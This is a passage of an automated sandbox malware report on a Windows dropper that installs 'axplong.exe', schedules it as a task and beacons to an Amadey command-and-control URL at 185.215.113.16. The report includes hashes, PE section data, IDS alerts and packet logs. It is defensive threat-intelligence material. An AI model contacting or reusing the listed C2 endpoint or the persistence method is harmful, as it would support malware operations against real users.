http://185.215.113.16/Jo89Ku7d/index.phpyB	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpw	axplong.exe, 00000006.00000002.2995896267.0000000001386000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpu	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.php$BG	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncodedlB	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpt	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpdedgB	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.php1	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520715
Start date and time:	2024-09-27 19:03:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@1/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 7612 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 7620 because there are no executed function
Execution Graph export aborted for target file.exe, PID 7424 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
13:05:01	API Interceptor	228382x Sleep call for process: axplong.exe modified
18:04:04	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.16	file.exe	Get hash	malicious	Amadey, BitCoin Miner, SilentXMRMiner	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	8y4qT1eVpi.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16/soka/random.exe
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey, BitCoin Miner, SilentXMRMiner	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	kYpONUhAR5.exe	Get hash	malicious	RedLine	Browse	185.215.113.67
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	185.215.113.103
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1949184
Entropy (8bit):	7.950080713754448
Encrypted:	false
SSDEEP:	49152:yZG2dyiQpYbjL9e9kMxKRVvpOxFgUYqLDICctTPzsTcD:zDGbNOk+KRdpsFgDmstzhD
MD5:	572146DA15EDF1DAAC1B337A71D9A1F7
SHA1:	5535C753E8A7985AA95D1BADA3163E82BA037931
SHA-256:	34B6C45D4626A404FA0B29C42D6C4850687FDB6B57E22708CD719653878BC8F3
SHA-512:	14E2384AA523BEC4E6A10ABA2ED33122D4E85FEC5E4FDF6876FCC607B9A468D00514CFD826F9533E75CF4CC0A2640AFAAB3496361DC5659CA0B12A9FFD02BAA9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................0M...........@..........................`M.....c.....@.................................W...k.............................M...............................M..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...wygwfpzp.....p2.....................@...puucqgap..... M.....................@....taggant.0...0M.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	3.428082396979352
Encrypted:	false
SSDEEP:	6:xQRj5XpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lbCt0:xqjFpRKQ1lOmeeDHjzvYRQVet0
MD5:	6B3CADD452C914DAF07623BBB735CB6F
SHA1:	7FB6DCA031A93EDEC356BBB5AE63542ED792F348
SHA-256:	7B9E4CFCBBF8A52E784E6E291B63F9907D6D0AF4088426D02BC90A3070C2B5E1
SHA-512:	66C32B112E7ED3DFC961F127BFE6642D1F49FA8B7E8C87660E5141CB0B0FD0D71C9C9298F19D0A4B2BDC255E0A1747635D26447C2752E380BBA0397B0A6CD944
Malicious:	false
Reputation:	low
Preview:	..../.2.p5.H..n...T.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.950080713754448
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'949'184 bytes
MD5:	572146da15edf1daac1b337a71d9a1f7
SHA1:	5535c753e8a7985aa95d1bada3163e82ba037931
SHA256:	34b6c45d4626a404fa0b29c42d6c4850687fdb6b57e22708cd719653878bc8f3
SHA512:	14e2384aa523bec4e6a10aba2ed33122d4e85fec5e4fdf6876fcc607b9a468d00514cfd826f9533e75cf4cc0a2640afaab3496361dc5659ca0b12a9ffd02baa9
SSDEEP:	49152:yZG2dyiQpYbjL9e9kMxKRVvpOxFgUYqLDICctTPzsTcD:zDGbNOk+KRdpsFgDmstzhD
TLSH:	B89533882CF4FF19E1B6EC384BEA70B95A0D177B0C449252DE2661A921F5F4FC799870
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8d3000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FD6488A441Ah
setl byte ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+03h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jnle 00007FD6488A4392h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
out dx, eax
add al, byte ptr [eax]
add byte ptr [esi], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4d0fe4	0x10	wygwfpzp
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4d0f94	0x18	wygwfpzp
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	4cec7a0f10f37722275498f440fb277a	False	0.9973337448910081	data	7.984881564074441	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	d80046ecd18d6d7f0527f3c7be88fc1a	False	0.578125	data	4.537600421104909	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2bc000	0x200	8cdab02883b39b1908324435a68f2e54	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wygwfpzp	0x327000	0x1ab000	0x1aa200	b716671160ae351b7dce8cc3d637e6d1	False	0.994612147990613	data	7.954236015998608	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
puucqgap	0x4d2000	0x1000	0x600	56d787d9f3d4041b954fd4815fe88841	False	0.6119791666666666	data	5.267444705735488	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4d3000	0x3000	0x2200	18e6985e20a4f81bfa7a1635abb9054d	False	0.0685891544117647	DOS executable (COM)	0.7914104558190661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4d0ff4	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T19:05:15.617414+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	62769	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 19:05:03.274578094 CEST	62759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:03.279546976 CEST	80	62759	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:03.279634953 CEST	62759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:03.279798985 CEST	62759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:03.284671068 CEST	80	62759	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:04.634599924 CEST	80	62759	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:04.635782957 CEST	80	62759	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:04.635863066 CEST	62759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:04.637388945 CEST	80	62759	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:04.637434959 CEST	62759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:04.637726068 CEST	62759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:04.643321991 CEST	80	62759	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:04.879264116 CEST	80	62759	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:04.880899906 CEST	62759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:04.994091988 CEST	62759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:04.994395018 CEST	62760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:04.999181986 CEST	80	62760	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:04.999247074 CEST	62760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:04.999316931 CEST	62760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:04.999563932 CEST	80	62759	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:04.999609947 CEST	62759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:05.005024910 CEST	80	62760	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:05.719552994 CEST	80	62760	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:05.719604015 CEST	62760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:05.720820904 CEST	62760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:05.725636005 CEST	80	62760	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:05.949501038 CEST	80	62760	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:05.949563026 CEST	62760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:06.056582928 CEST	62760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:06.056864023 CEST	62761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:06.062462091 CEST	80	62760	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:06.062474966 CEST	80	62761	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:06.062530994 CEST	62760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:06.062553883 CEST	62761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:06.062747955 CEST	62761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:06.067840099 CEST	80	62761	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:06.773173094 CEST	80	62761	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:06.773262024 CEST	62761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:06.774979115 CEST	62761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:06.779885054 CEST	80	62761	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:07.005067110 CEST	80	62761	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:07.005136013 CEST	62761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:07.119103909 CEST	62761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:07.119376898 CEST	62762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:07.124152899 CEST	80	62762	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:07.124233007 CEST	62762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:07.124268055 CEST	80	62761	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:07.124317884 CEST	62761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:07.124454021 CEST	62762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:07.129173994 CEST	80	62762	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:07.845071077 CEST	80	62762	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:07.845240116 CEST	62762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:07.845870972 CEST	62762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:07.850681067 CEST	80	62762	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:08.076653004 CEST	80	62762	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:08.076742887 CEST	62762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:08.228867054 CEST	62762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:08.234078884 CEST	80	62762	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:08.234147072 CEST	62762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:08.267081022 CEST	62763	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:08.272098064 CEST	80	62763	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:08.272176981 CEST	62763	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:08.272320986 CEST	62763	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:08.277102947 CEST	80	62763	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:08.993936062 CEST	80	62763	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:08.994014978 CEST	62763	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:08.994999886 CEST	62763	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:08.999797106 CEST	80	62763	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:09.317238092 CEST	80	62763	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:09.317295074 CEST	62763	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:09.432118893 CEST	62763	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:09.432419062 CEST	62764	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:09.437338114 CEST	80	62764	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:09.437417030 CEST	62764	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:09.437510967 CEST	62764	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:09.437541962 CEST	80	62763	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:09.437597990 CEST	62763	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:09.442311049 CEST	80	62764	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:10.163738012 CEST	80	62764	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:10.163845062 CEST	62764	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:10.164438963 CEST	62764	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:10.169223070 CEST	80	62764	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:10.399038076 CEST	80	62764	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:10.399127007 CEST	62764	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:10.510458946 CEST	62764	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:10.510788918 CEST	62765	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:10.516541004 CEST	80	62764	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:10.516655922 CEST	62764	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:10.516758919 CEST	80	62765	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:10.516836882 CEST	62765	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:10.517086029 CEST	62765	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:10.522789955 CEST	80	62765	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:11.242234945 CEST	80	62765	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:11.242414951 CEST	62765	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:11.376559973 CEST	62765	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:11.381439924 CEST	80	62765	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:11.606090069 CEST	80	62765	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:11.606332064 CEST	62765	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:11.713301897 CEST	62765	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:11.714199066 CEST	62766	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:11.718606949 CEST	80	62765	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:11.718709946 CEST	62765	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:11.718969107 CEST	80	62766	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:11.719094992 CEST	62766	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:11.719474077 CEST	62766	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:11.724234104 CEST	80	62766	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:12.437840939 CEST	80	62766	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:12.437910080 CEST	62766	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:12.440521002 CEST	62766	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:12.447343111 CEST	80	62766	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:12.671224117 CEST	80	62766	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:12.671314001 CEST	62766	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:12.775355101 CEST	62766	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:12.775652885 CEST	62767	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:12.780633926 CEST	80	62766	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:12.780697107 CEST	62766	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:12.780791044 CEST	80	62767	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:12.780855894 CEST	62767	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:12.780961990 CEST	62767	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:12.785929918 CEST	80	62767	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:13.480228901 CEST	80	62767	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:13.480294943 CEST	62767	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:13.480870962 CEST	62767	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:13.485588074 CEST	80	62767	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:13.704843998 CEST	80	62767	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:13.704915047 CEST	62767	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:13.806632042 CEST	62767	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:13.807073116 CEST	62768	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:13.811733007 CEST	80	62767	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:13.811815023 CEST	62767	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:13.811837912 CEST	80	62768	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:13.811902046 CEST	62768	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:13.812005043 CEST	62768	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:13.816966057 CEST	80	62768	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:14.511718988 CEST	80	62768	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:14.511892080 CEST	62768	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:14.512782097 CEST	62768	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:14.517554045 CEST	80	62768	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:14.739614010 CEST	80	62768	185.215.113.16	192.168.2.4
